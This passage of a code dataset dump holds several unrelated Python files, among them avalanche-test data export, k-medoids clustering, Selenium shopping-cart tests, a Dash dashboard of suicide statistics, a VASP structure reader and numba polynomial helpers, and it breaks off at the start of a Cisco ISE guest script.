Da kan jeg\n for eksempel se på resultater som på hvilken dybde ECT og CT gir respons, hvis det\n finnes noen sammenheng mellom forplanting og dybde etc.\n\n I tillegg skulle jeg kunne se på alle stabilitetstester som er utført sammen med\n snøprofiler og trekke ut data fra det. Men det er jeg redd blir en mye mer manuell oppgave.\n\n Mvh\n Gustav\n\n :return:\n \"\"\"\n\n years = ['2019-20', '2018-19', '2017-18', '2016-17']\n # years = ['2018-19']\n\n all_observations = []\n for y in years:\n all_observations += gvp.get_all_observations(y)\n\n tests = []\n\n for o in all_observations:\n for f in o.Observations:\n if isinstance(f, go.ColumnTest) or isinstance(f, go.ProfileColumnTest):\n if f.CompetenceLevelTID >= 120: # Level of Competence at *** or more\n if 'Ikke gitt' not in f.PropagationName:\n\n profile = None\n if f.IncludeInSnowProfile:\n for tf in o.Observations:\n if isinstance(tf, go.SnowProfile):\n profile = tf\n\n tests.append(TestsAndLayerInfo(f, profile))\n\n file_and_folder = f'{env.output_folder}tests_to_gustav_pless.csv'\n\n # Write to file\n with open(file_and_folder, 'w', encoding='utf-8') as f:\n make_header = True\n for t in tests:\n if make_header:\n f.write(';'.join([_str(d) for d in t.to_ord_dict().keys()]) + '\\n')\n make_header = False\n f.write(';'.join([_str(d) for d in t.to_ord_dict().values()]) + '\\n')\n\n\nif __name__ == '__main__':\n\n get_tests_and_layer_info_to_gustav()\n","sub_path":"varsomscripts/testsandprofiles.py","file_name":"testsandprofiles.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"258765721","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 01 11:28:27 2015\n\n@author: tsz\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport math\nimport k_medoids\nimport k_medoids_google_or\nimport clustering_helpers\n\ndef _distances(values, norm=2):\n \"\"\"\n Compute distance matrix for all data sets (rows of values)\n \n Parameters\n ----------\n values : 2-dimensional array\n Rows represent days and columns values\n norm : integer, optional\n Compute the distance according to this norm. 2 is the standard\n Euklidean-norm.\n \n Return\n ------\n d : 2-dimensional array\n Distances between each data set\n \"\"\"\n # Initialize distance matrix\n d = np.zeros((values.shape[1], values.shape[1]))\n\n # Define a function that computes the distance between two days\n dist = (lambda day1, day2, r: \n math.pow(np.sum(np.power(np.abs(day1 - day2), r)), 1/r))\n\n # Remember: The d matrix is symmetrical!\n for i in range(values.shape[1]): # loop over first days\n for j in range(i+1, values.shape[1]): # loop second days\n d[i, j] = dist(values[:,i], values[:,j], norm)\n \n # Fill the remaining entries\n d = d + d.T\n \n return d\n\n\ndef cluster(inputs, \n number_clusters=12, \n norm=2, \n time_limit=300,\n mip_gap=0.0,\n google_or=False):\n \"\"\"\n Cluster a set of inputs into clusters by solving a k-medoid problem.\n \n Parameters\n ----------\n inputs : 2-dimensional array\n First dimension: Number of different input types.\n Second dimension: Values for each time step of interes.\n number_clusters : integer, optional\n How many clusters shall be computed?\n norm : integer, optional\n Compute the distance according to this norm. 
2 is the standard\n Euklidean-norm.\n time_limit : integer, optional\n Time limit for the optimization in seconds\n mip_gap : float, optional\n Optimality tolerance (0: proven global optimum)\n \n Returns\n -------\n scaled_typ_days : \n Scaled typical demand days. The scaling is based on the annual demands.\n nc : array_like\n Weighting factors of each cluster\n z : 2-dimensional array\n Mapping of each day to the clusters\n \"\"\"\n # Determine time steps per day\n len_day = 24\n days = int(inputs.shape[1] / len_day)\n \n # Manipulate inputs\n # Initialize arrays\n inputsTransformed = []\n inputsScaled = []\n inputsScaledTransformed = []\n \n # Fill and reshape\n # Scaling to values between 0 and 1, thus all inputs shall have the same\n # weight and will be clustered equally in terms of quality \n for i in range(inputs.shape[0]):\n vals = inputs[i,:]\n temp = (vals - np.min(vals)) / (np.max(vals) - np.min(vals))\n inputsScaled.append(temp)\n inputsScaledTransformed.append(temp.reshape((len_day, days), order=\"F\"))\n inputsTransformed.append(vals.reshape((len_day, days), order=\"F\"))\n\n # Put the scaled and reshaped inputs together\n L = np.concatenate(tuple(inputsScaledTransformed))\n\n # Compute distances\n d = _distances(L, norm)\n\n # Execute optimization model\n if google_or:\n opt_function = k_medoids_google_or.k_medoids\n else:\n opt_function = k_medoids.k_medoids\n (y, z, obj, gap) = opt_function(d, number_clusters, time_limit, mip_gap)\n \n # Section 2.3 and retain typical days\n nc = np.zeros(number_clusters)\n typicalDays = []\n\n # nc contains how many days are there in each cluster\n nc = []\n for i in xrange(len(y)):\n temp = np.sum(z[i,:])\n if temp > 0:\n nc.append(temp)\n typicalDays.append([ins[:,i] for ins in inputsTransformed])\n\n typicalDays = np.array(typicalDays)\n nc = np.array(nc, dtype=\"int\")\n\n # Scaling to preserve original demands\n scaled = clustering_helpers.scaling(inputs=inputs,\n typicalDays=typicalDays,\n nc=nc)\n (scaled_typ_days, scaling_factors) = scaled\n \n return (scaled_typ_days, nc, z, scaling_factors, obj, gap)","sub_path":"k_medoids_google_or/clustering_exact.py","file_name":"clustering_exact.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"100988189","text":"\nfrom behave import given, when, then\nfrom time import sleep\nfrom selenium.webdriver.common.by import By\n\nsearch = (By.ID, 'twotabsearchtextbox')\nsearch_icon = (By.CSS_SELECTOR, \"input.nav-input[value='Go']\")\nselect_item = (By.CSS_SELECTOR, \"img.s-image[src='https://m.media-amazon.com/images/I/811mZ5F0YVL._AC_UL320_.jpg']\")\nadd_cart = (By.CSS_SELECTOR, \"input#add-to-cart-button\")\n#number_items = (By.XPATH, \"//span[@class='sc-without-fresh-inline']\")\nnumber_items=(By.ID, 'sc-subtotal-label-buybox')\nopen_cart = (By.CSS_SELECTOR, \"nav-cart\")\n\n\n@given('open amazon website')\ndef open_amazon(context):\n context.driver.get(\"https://www.amazon.com\")\n context.driver.maximize_window()\n sleep(4)\n\n\n@when('input teddy bear into search field')\ndef teddy_bear_search(context):\n search_item = context.driver.find_element(*search)\n search_item .send_keys(\"teddy bear\")\n context.driver.find_element(*search_icon).click()\n #search_icon.click()\n sleep(3)\n\n\n@when('click on the product')\ndef click_product(context):\n context.driver.find_element(*select_item).click()\n\n\n@when('click on add to cart')\ndef add_item(context):\n 
context.driver.find_element(*add_cart).click()\n\n\n@then('verify number of items')\ndef verify_number(context):\n context.driver.find_element(*open_cart).click()\n verify = context.driver.find_element(*number_items)\n assert 'Subtotal (1 item)' in verify.text\n","sub_path":"features/steps/amazon_cart.py","file_name":"amazon_cart.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"268164701","text":"import numpy as np\nimport geom.cuboct\n\nvox_pitch = 0.0762 #m\ncord = 2*0.3048 #m\n\n#Create 2-D bounding box for voxelization\n#Estimate number of voxels in cord length\nsize_x = round(cord/vox_pitch);\nsize_y = round(0.3*size_x);\n\nmat_matrix = []\n\nfor i in range(0,size_y):\n temprow = []\n for j in range(0,size_x):\n #This is just temporary it will be replaced with intertools.permutations later\n if (i==1)|((i==0)&(j==2)):\n temprow.append([1])\n else:\n temprow.append([0])\n mat_matrix.append(temprow)\n\nnode_frame_map = np.zeros((size_x,size_y,1,6))\nnodes,frames,node_frame_map,dims = geom.cuboct.from_material(mat_matrix,vox_pitch)\n\n","sub_path":"src/crossSection.py","file_name":"crossSection.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"593211036","text":"import dash\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n#import dash_daq as daq\n\nimport src.dash_plots \n\n\nfrom src.data_mugging import clean_data\nimport src.data_mugging\nimport pandas as pd\n\nsuicide_dataset = pd.read_csv('data/master.csv')\ncleaned_data = clean_data('data/master.csv')\n\n\nfigure1 = global_suicide_stat = src.dash_plots.create_world_plot(cleaned_data,\n location='code',\n color='suicides_no',\n hover_name='country')\n\n# Suicides_per_capita plot:\ndata_clean_suicide_per_capita = src.data_mugging.suicides_per_capita(\n suicide_dataset)\n\n# Suicides by gender plot:\ndata_suicides_by_gender = src.data_mugging.suicides_by_gender(suicide_dataset)\n\n# suicides by gdp\ndata_suicides_by_gdp = src.data_mugging.suicide_by_gdp(suicide_dataset)\n\n# Create a list that is required for the slider:\nsuicide_dataset['year'] = pd.to_datetime(suicide_dataset.year, format='%Y')\nsuicide_dataset['year'] = suicide_dataset['year'].dt.year\ndate_list = suicide_dataset['year'].unique().tolist()\ndate_label = [str(i) for i in date_list]\nzipobj = zip(date_label, date_label)\ndic_date = dict(zipobj)\n# dict_date_hard_code = {i : '{}'.format(i) for i in range(1987,2016, 3)}\n\n# Create an array for year:\nyear_value = [1985, 2016]\nyear_value = pd.to_datetime(pd.Series(year_value), format='%Y')\nyear_value = year_value.dt.year\n\napp = dash.Dash(external_stylesheets=[dbc.themes.SLATE])\nserver = app.server\n\napp.layout = dbc.Container([\n html.H1('SUICIDES : A GLOBAL IMPERATIVE',\n style={'text-align': 'center'}),\n html.H5('Our dashboard provides an interactive exploration of suicide rates overview from 1985 to 2016. 
The data is visualized by age, country, gender and generation'),\n html.Br(),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n 'COUNTRY',\n dcc.Dropdown(\n id='country-dropdown',\n value='Canada',\n options=[{'label': col, 'value': col} for col in cleaned_data['country']],placeholder = 'Select Country'),\n\n html.Br(),\n 'AGE',\n dcc.Dropdown(\n id='age-dropdown',\n value='15-24 years',\n options=[{'label': col, 'value': col} for col in suicide_dataset['age'].unique()]),\n\n html.Br(),\n\n 'GENDER',\n dcc.Dropdown(\n id='gender-dropdown',\n value='male',\n options=[{'label': 'Male', 'value': 'male'},\n {'label': 'Female', 'value': 'female'}],\n # multi = True\n # labelStyle={'display': 'inline-block', 'cursor': 'pointer', 'margin-left': '20px'}\n )])]))], width=4),\n\n dbc.Col(\n [dbc.Card(dbc.CardBody([html.P(dcc.Graph(figure=figure1))]))], width=8),\n ]\n ),\n html.Br(),\n\n html.H3('Economic Factors'),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n dbc.Row([\n dbc.Col([\n # Aditya's graph:\n html.Iframe(\n id='scatter',\n style={'border-width': '0', 'width': '100%', 'height': '400px'})\n ]),\n dbc.Col([\n html.Iframe(\n srcDoc=src.dash_plots.country_plot(\n source=data_suicides_by_gdp),\n id='scroll-plot',\n style={'border-width': '0',\n 'width': '100%', 'height': '410px'}\n )\n ])\n ]),\n ])\n ]))], width=12)\n ]),\n html.Br(),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n html.Div(\n dcc.RangeSlider(\n id='range-slider',\n min=min(date_list),\n max=max(date_list),\n step=10,\n value=[min(date_list), max(date_list)],\n marks=dic_date,\n included=False\n )\n ),\n # html.Div(id='text-space')\n ])\n ]\n )\n )\n ]\n )\n ]\n ),\n\n\n html.H3('Age Related Factors'),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n dbc.Row([\n dbc.Col([\n html.Iframe(\n srcDoc=src.dash_plots.age_plot(\n country_dropdown='Canada', source=data_clean_suicide_per_capita, year=[1985, 2016]),\n id='mark_point',\n style={'border-width': '0',\n 'width': '100%', 'height': '400px'}\n )\n ]),\n dbc.Col([\n html.Iframe(\n srcDoc=src.dash_plots.plot_suicide_boxplot(\n country_dropdown='Canada', data=suicide_dataset),\n id='boxplot',\n style={'border-width': '0',\n 'width': '100%', 'height': '400px'}\n ),\n ])\n ])])]))], width=12)]),\n html.Br(),\n\n html.H3('Sex Based Factors'),\n\n dbc.Row(\n [\n dbc.Col([dbc.Card(dbc.CardBody([html.P([\n html.Iframe(\n srcDoc=src.dash_plots.suicides_gender(\n data_suicides_by_gender),\n id='twinbar',\n style={'border-width': '0',\n 'width': '120%', 'height': '400px'}\n ),\n ])]))\n\n ])\n ]\n )])])\n\n# Sowmya's graph\n@ app.callback(\n Output('boxplot', 'srcDoc'),\n # Output('barplot', 'srcDoc'),\n [Input('country-dropdown', 'value')])\ndef update_output(chosencountry):\n return src.dash_plots.plot_suicide_boxplot(chosencountry, data=suicide_dataset)\n\n# Aditya's graph\n@ app.callback(\n Output('scatter', 'srcDoc'),\n Input('gender-dropdown', 'value'),\n Input('country-dropdown', 'value'),\n Input('age-dropdown', 'value'),\n # Input('generation-dropdown', 'value'),\n Input('range-slider', 'value')\n)\ndef update_output2(gender, country, age, year):\n return src.dash_plots.plot_suicide_gdp(data=suicide_dataset, sex=gender, country=country, age=age, year=year)\n\n# Poojitha's point graph:\n@ app.callback(\n Output('mark_point', 'srcDoc'),\n Input('country-dropdown', 'value'),\n Input('range-slider', 'value')\n)\ndef update_output4(chosencountry, year):\n return src.dash_plots.age_plot(country_dropdown=chosencountry, 
source=data_clean_suicide_per_capita, year=year)\n\n# Create a call back for the slider:\n#@ app.callback(\n# Output('text-space', 'children'),\n# Input('range-slider', 'value')\n#)\n#def update_output5(input_value):\n# year_input=pd.to_datetime(pd.Series(input_value), format='%Y')\n# year_input=year_input.dt.year\n# return year_input\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"275422184","text":"import os\nimport numpy as np\nfrom collections import OrderedDict\nfrom ase.io.vasp import read_vasp\nfrom ase.io.vasp import write_vasp\n\n\nclass StructureMagic():\n '''此类用于对于结构文件进行操作\n\n\n Attributes:\n\n '''\n\n def __init__(self, file=None, path=None):\n '''初始化结构文件所在路径和结构文件名称'''\n if file is None:\n self.file = 'POSCAR'\n else:\n self.file = file\n\n if path is None:\n self.path = os.getcwd()\n else:\n self.path = path\n self.cell = read_vasp(self.path + os.sep + self.file)\n\n def build_supercell(self, dim=[6, 6, 6], direct=True):\n '''超胞构建\n\n Args:\n dim:阔胞的大小,如[6,6,6]\n direct:布尔值,判断输出是否为direct\n Returns:\n name_supercell:超胞结构文件名称\n '''\n # 命名输出超胞的文件名\n name_supercell = str(self.cell.symbols) + '_supercell_' + str(dim[0]) + str(dim[1]) + str(dim[2])\n # 写入超胞\n write_vasp(self.path + os.sep + name_supercell, self.cell * np.array(dim), label=name_supercell,\n direct=direct, sort=True, vasp5=True)\n # 超胞结构\n self.supercell = self.cell * np.array(dim)\n return name_supercell\n\n\nclass StructureBasicInfo():\n '''此类用于读取结构文件POSCAR中的基本信息'''\n\n def __init__(self, file=None, path=None):\n '''初始化结构文件所在路径和结构文件名称'''\n if file is None:\n self.file = 'POSCAR'\n else:\n self.file = file\n\n if path is None:\n self.path = os.getcwd()\n else:\n self.path = path\n\n f = open(self.path + os.sep + self.file, 'r')\n self.lines = f.readlines()\n f.close()\n\n def get_system_name(self):\n '''获取POSCAR的system名称\n\n Returns:\n system_name:system名称\n '''\n system_name = str(self.lines[0].strip())\n return system_name\n\n def get_scaling_factor(self):\n '''获取POSCAR的缩放系数\n\n Returns:\n scaling_factor:缩放系数\n '''\n scaling_factor = np.array(\n str(self.lines[1]).strip().split()).astype(np.float)[0]\n return scaling_factor\n\n def get_lattice_matrix(self):\n '''获取POSCAR的晶格常数\n\n Returns:\n lattice_matrix:晶格常数\n '''\n a = np.array(str(self.lines[2]).strip().split()).astype(np.float)\n b = np.array(str(self.lines[3]).strip().split()).astype(np.float)\n c = np.array(str(self.lines[4]).strip().split()).astype(np.float)\n lattice_matrix = np.array([a, b, c])\n return lattice_matrix\n\n def get_atoms_info(self):\n '''获取POSCAR的原子信息\n\n Returns:\n atoms_info:[字典]原子信息,如Sn:2;O:4\n '''\n atoms_info = OrderedDict()\n atoms_keys = self.lines[5].strip().split()\n atoms_number = self.lines[6].strip().split()\n for i in range(len(atoms_keys)):\n atoms_info[atoms_keys[i]] = int(atoms_number[i])\n return atoms_info\n\n def get_coordinate_type(self):\n '''获取POSCAR的坐标轴信息\n Returns:\n coordinate_type:Direct or Cartesian\n '''\n coordinate_type = str(self.lines[7].strip())\n return coordinate_type\n\n def get_atoms_position_matrix(self):\n '''获取POSCAR的所有原子坐标\n\n Returns:\n atoms_position_matrix:所有原子坐标矩阵\n '''\n atoms_sum = self.get_atoms_sum()\n atoms_position_matrix = np.zeros((atoms_sum, 3))\n for i in range(atoms_sum):\n atoms_position_matrix[i] = np.array(\n str(self.lines[i + 8]).strip().split())[0:3].astype(np.float)\n return 
atoms_position_matrix\n\n def calAngleBetween2Vectors(self, vector0, vector1):\n '''\n 获取两个矢量的夹角\n '''\n angle = np.arccos(np.dot(vector0, vector1) /\n (np.linalg.norm(vector0) * np.linalg.norm(vector1)))\n return angle\n\n def calLatticeMatrix_Transformation_2D(self):\n LatticeMatrix = self.getLatticeMatrix()\n a = LatticeMatrix[0]\n b = LatticeMatrix[1]\n angle = self.calAngleBetween2Vectors(a, b)\n a_norm = np.linalg.norm(a)\n b_norm = np.linalg.norm(b)\n a = np.array([np.cos(angle / 2) * a_norm, np.sin(angle / 2) * a_norm, 0])\n b = np.array([np.cos(angle / 2) * b_norm, np.sin(angle / 2) * b_norm * (-1), 0])\n return a, b\n\n def get_atoms_sum(self):\n '''获取POSCAR的总原子数目\n\n Returns:\n atoms_sum:总原子数目\n '''\n atoms_info = self.get_atoms_info()\n atoms_sum = 0\n for value in atoms_info.values():\n atoms_sum += value\n return atoms_sum\n\n def get_volume(self):\n '''获取POSCAR的晶胞体积\n\n Returns:\n volume:晶胞体积\n '''\n sf = self.get_scaling_factor()\n a = np.array(str(self.lines[2]).strip().split()).astype(np.float) * sf\n b = np.array(str(self.lines[3]).strip().split()).astype(np.float) * sf\n c = np.array(str(self.lines[4]).strip().split()).astype(np.float) * sf\n volume = np.dot(np.cross(a, b), c)\n return volume\n\n def get_elements_position_matrix(self):\n '''获取POSCAR的同一元素的原子坐标\n\n Returns:\n elements_position_matrix:同一元素的原子坐标矩阵\n '''\n atoms_info = self.get_atoms_info()\n atoms_position_matrix = self.get_atoms_position_matrix()\n\n elements_position_matrix = OrderedDict()\n count = 0\n for key, value in atoms_info.items():\n elements_position_matrix[key] = np.zeros((value, 3))\n for i in range(value):\n elements_position_matrix[key][i] = atoms_position_matrix[i + count]\n count += value\n return elements_position_matrix\n","sub_path":"read_POSCAR/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"557548250","text":"import datetime\n\nclass Pile(object):\n def __init__(self, platforms=[], games=[]):\n self.platforms = platforms\n self.games = games\n\n def __repr__(self):\n return (\"PileGame({x.platforms!r}, {x.games!r})\").format(x=self)\n\n def search(self, exact_name=None, name=None, platform=None, priorities=None, genres=None):\n def has_substr(haystack, needle):\n return needle.lower() in haystack.lower()\n\n def has_any_substr(haystacks, needles):\n xs = [(h, n) for h in haystacks for n in needles if has_substr(h, n)]\n return len(xs) > 0\n\n gs = self.games\n\n if exact_name:\n gs = filter(lambda g: g.name.lower() == exact_name.lower(), gs)\n\n if name:\n gs = filter(lambda g: has_substr(g.name, name), gs)\n\n if platform:\n gs = filter(lambda g: g.platform.lower() == platform.lower(), gs)\n\n if priorities:\n gs = filter(lambda g: g.priority in priorities, gs)\n\n if genres:\n gs = filter(lambda g: has_any_substr(g.genres, genres), gs)\n\n return gs\n\nclass PilePlatform(object):\n def __init__(self, key, name):\n self.key = key\n self.name = name\n\n def __repr__(self):\n return (\"PilePlatform({x.key!r}, {x.name!r})\").format(x=self)\n\nclass PileGame(object):\n PRIORITY_HIGH=1\n PRIORITY_MED=2\n PRIORITY_LOW=3\n\n def __init__(self,\n name,\n platform,\n on_pile_date=datetime.date.today(),\n priority=PRIORITY_MED,\n hours=10,\n genres=[],\n notes=\"\"):\n self.name = name\n self.platform = platform\n self.on_pile_date = on_pile_date\n self.priority = priority\n self.hours = hours\n self.genres = genres\n self.notes = notes\n\n def 
__repr__(self):\n return (\"PileGame({x.name!r}, \"\n + \"{x.platform!r}, \"\n + \"{x.on_pile_date!r}, \"\n + \"{x.priority!r}, \"\n + \"{x.hours!r}, \"\n + \"{x.genres!r}, \"\n + \"{x.notes!r})\").format(x=self)\n","sub_path":"Gomer/gomer/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"421590682","text":"# TODO\n# for Ahead-Of-Time Compilation:\n# from numba.pycc import CC\n# cc = CC('compiled_helpers', )\n# # Uncomment the following line to print out the compilation steps\n# cc.verbose = True\n\n\n# precompiled time critical helper functions\nimport numpy as np\nfrom numba import b1, f8, jit, u4\n\n\n# TODO define and import dtypes globally\n# @jit(f8(f8[:], f8[:], u4[:, :]), nopython=True, cache=True)\ndef naive_eval(x, coefficients, exponents):\n nr_coeffs = len(coefficients)\n # nr_monomials,nr_dims = exponents.shape\n # assert nr_monomials == nr_coeffs\n # assert len(x) == nr_dims\n acc = 0.0\n for i in range(nr_coeffs):\n acc = acc + coefficients[i] * np.prod(np.power(x, exponents[i, :]))\n return acc\n\n # equivalent one liner:\n # TypingError: numba doesn't support kwarg for prod\n # return np.sum(coefficients.T * np.prod(np.power(x, exponents), axis=1), axis=1)[0]\n\n\n# @cc.export('eval_compiled', 'f8(f8[:], f8[:], u4[:, :], u4[:, :], u4[:, :], u4[:, :], b1[:], u4)')\n@jit(f8(f8[:], f8[:], u4[:, :], u4[:, :], u4[:, :], u4[:, :], b1[:], u4), nopython=True, cache=True, debug=True)\ndef eval_recipe(x, value_array, copy_recipe, scalar_recipe, monomial_recipe, tree_recipe, tree_ops, root_value_address):\n # IMPORTANT: the order of following the recipes is not arbitrary!\n # scalar factors need to be evaluated before monomial factors depending on them...\n\n # in order to evaluate scalar factors with exponent 1, no exponentiation operation is required\n # simply copy the values of x to the value array\n # copy recipe instruction encoding: target, source\n # [target, source] = copy_recipe[i, :]\n for i in range(copy_recipe.shape[0]):\n # value_array[target] = x[source1]\n value_array[copy_recipe[i, 0]] = x[copy_recipe[i, 1]]\n\n # print('computing scalar factors: ...')\n # scalar recipe instruction encoding: target, source, exponent\n # [target, source1, exponent] = scalar_recipe[i, :]\n for i in range(scalar_recipe.shape[0]):\n # print('value[{}] = {} ^ {}'.format(target, x[source1], exponent))\n # value_array[target] = x[source1] ** exponent\n value_array[scalar_recipe[i, 0]] = x[scalar_recipe[i, 1]] ** scalar_recipe[i, 2]\n\n # # DEBUG:\n # accessed_idxs = set()\n\n # print('computing monomial factors: ...')\n # monomial recipe instruction encoding: target, source1, source2\n # [target, source1, source2] = monomial_recipe[i, :]\n for i in range(monomial_recipe.shape[0]):\n # print('value[{}] = {} * {} (idx: {}, {})'.format(target, value_array[source1], value_array[source2], source1,\n # source2))\n # value_array[target] = value_array[source1] * value_array[source2]\n value_array[monomial_recipe[i, 0]] = value_array[monomial_recipe[i, 1]] * value_array[monomial_recipe[i, 2]]\n\n # # DEBUG:\n # accessed_idxs.add(monomial_recipe[i, 1])\n # accessed_idxs.add(monomial_recipe[i, 2])\n\n # print('evaluating factorisation tree: ...')\n # tree recipe instruction encoding: target, source\n # [target, source] = tree_recipe[i, :]\n # separate operation array: *op_id*\n # value_array[target] = value_array[target] *op* value_array[source]\n for i in 
range(tree_recipe.shape[0]):\n target = tree_recipe[i, 0]\n source = tree_recipe[i, 1]\n if tree_ops[i]: # ADDITION: 1\n # print('value[{}] = {} + {}'.format(target, value_array[target], value_array[source1]))\n # value_array[target] = value_array[target] + value_array[source1]\n value_array[target] = value_array[target] + value_array[source]\n else: # MULTIPLICATION: 0\n # print('value[{}] = {} * {}'.format(target, value_array[target], value_array[source1]))\n # value_array[target] = value_array[target] * value_array[source1]\n value_array[target] = value_array[target] * value_array[source]\n\n # # DEBUG:\n # accessed_idxs.add(target)\n # accessed_idxs.add(source)\n\n # # DEBUG:\n # all_idxs = {x for x in range(len(value_array))}\n # non_accessed_idxs = all_idxs - accessed_idxs\n # # coefficients are stored in the indices until one before the root address\n # coefficient_idxs = {x for x in range(root_value_address)}\n # non_accessed_coefficients = non_accessed_idxs & coefficient_idxs\n # if len(non_accessed_coefficients) > 0:\n # raise ValueError(f'BUG: these coefficients have been accessed: {non_accessed_coefficients}')\n #\n # # NOTE: no indices must be accessed when the polynomial is a constant\n # if len(non_accessed_idxs) > 0 and len(value_array) > 1:\n # raise ValueError(f'BUG: these idxs have been accessed: {non_accessed_idxs}')\n\n return value_array[root_value_address] # return value of the root node\n\n\n@jit(u4(u4[:]), nopython=True, cache=True)\ndef num_ops_1D_horner(unique_exponents):\n \"\"\"\n :param unique_exponents: np array of unique exponents sorted in increasing order without 0\n :return: the number of operations of the one dimensional Horner factorisation\n without counting additions (just MUL & POW) and without considering the coefficients\n\n\n NOTE: in 1D the Horner factorisation is both unique and optimal (minimal amount of operations)\n \"\"\"\n nr_unique_exponents = unique_exponents.shape[0]\n # the exponent 0 is not present!\n assert not np.any(unique_exponents == 0)\n\n if nr_unique_exponents == 0:\n return 0\n\n # one MUL operation is required !between! 
all factors in the factorisation chain\n # the amount of factors (= \"length of factorisation chain\") is equal to the amount of unique existing exponents\n num_ops = nr_unique_exponents - 1\n\n # start with exponent 0 (not in unique exponents)\n # the difference between one and the next exponent determines if a POW operation is needed to evaluate a factor\n # unique exponents are sorted: prev_exp < exp\n prev_exp = 0\n for i in range(nr_unique_exponents):\n exp = unique_exponents[i]\n if exp - prev_exp >= 2:\n num_ops += 1 # 1 POW operation\n prev_exp = exp\n\n return num_ops\n\n\n@jit(u4(u4[:, :]), nopython=True, cache=True)\ndef true_num_ops(exponent_matrix):\n \"\"\"\n without counting additions (just MUL & POW) and but WITH considering the coefficients (1 MUL per monomial)\n \"\"\"\n num_ops = 0\n for monomial_nr in range(exponent_matrix.shape[0]):\n for dim in range(exponent_matrix.shape[1]):\n exp = exponent_matrix[monomial_nr, dim]\n if exp > 0:\n # per scalar factor 1 MUL operation is required\n num_ops += 1\n if exp >= 2:\n # for scalar factors with exponent >= 2 additionally 1 POW operation is required\n num_ops += 1\n\n return num_ops\n\n\n@jit(u4[:](u4, u4[:], u4[:], u4[:, :]), nopython=True, cache=True)\ndef compile_usage(dim, usage_vector, unique_exponents, exponent_matrix):\n \"\"\"\n :return: a vector with the usage count of every unique exponent\n \"\"\"\n\n for i in range(exponent_matrix.shape[0]):\n exp = exponent_matrix[i, dim]\n for j in range(len(unique_exponents)):\n if exp < unique_exponents[j]:\n break\n usage_vector[j] += 1\n\n return usage_vector\n\n\n@jit(b1[:](u4, b1[:], u4[:], u4[:], u4[:, :]), nopython=True, cache=True)\ndef compile_valid_options(dim, valid_option_vector, usage_vector, unique_exponents, exponent_matrix):\n if len(valid_option_vector) == 0:\n # there are no unique exponents\n return valid_option_vector\n\n usage_vector = compile_usage(dim, usage_vector, unique_exponents, exponent_matrix)\n\n for exp_idx in range(usage_vector.size):\n # stop at the highest exponent having a usage >=2\n if usage_vector[exp_idx] >= 2:\n valid_option_vector[exp_idx] = True\n else:\n # all higher exponents have a lower usage!\n break\n\n return valid_option_vector\n\n\n@jit(u4(u4, u4, u4[:, :]), nopython=True, cache=True)\ndef count_usage(dim, exp, exponent_matrix):\n \"\"\"\n :return: the amount of times a scalar factor appears in the monomials\n \"\"\"\n\n usage_cnt = 0\n for i in range(exponent_matrix.shape[0]):\n if exponent_matrix[i, dim] >= exp:\n usage_cnt += 1\n\n return usage_cnt\n\n\n@jit(u4(u4, u4), nopython=True, cache=True)\ndef factor_num_ops(dim, exp):\n \"\"\"\n :return: the amount of operations required to evaluate the scalar factor\n \"\"\"\n if exp >= 2:\n # 1 MUL + 1 POW\n return 2\n else:\n # 1 MUL\n return 1\n","sub_path":"multivar_horner/helpers_fcts_numba.py","file_name":"helpers_fcts_numba.py","file_ext":"py","file_size_in_byte":8637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"75571300","text":"import sys\nfrom inspect import getframeinfo, stack\nimport requests, base64\nimport json\nimport time\nfrom datetime import datetime, timezone , timedelta\nimport re\nimport random\nfrom dicttoxml import dicttoxml\n\n\n\"\"\"\nG_CISCO_ISE_Domain = ''\nG_sponsor_username = 'summit.cwa.sponsor'\nG_sponsor_Password = ''\nG_guestType = 'Contractor (default)'\nG_portalId= ''\nG_Duration = '2 hours'\nG_Location = 'Harman'\nG_Reason_For_Visit =r'''Demo 
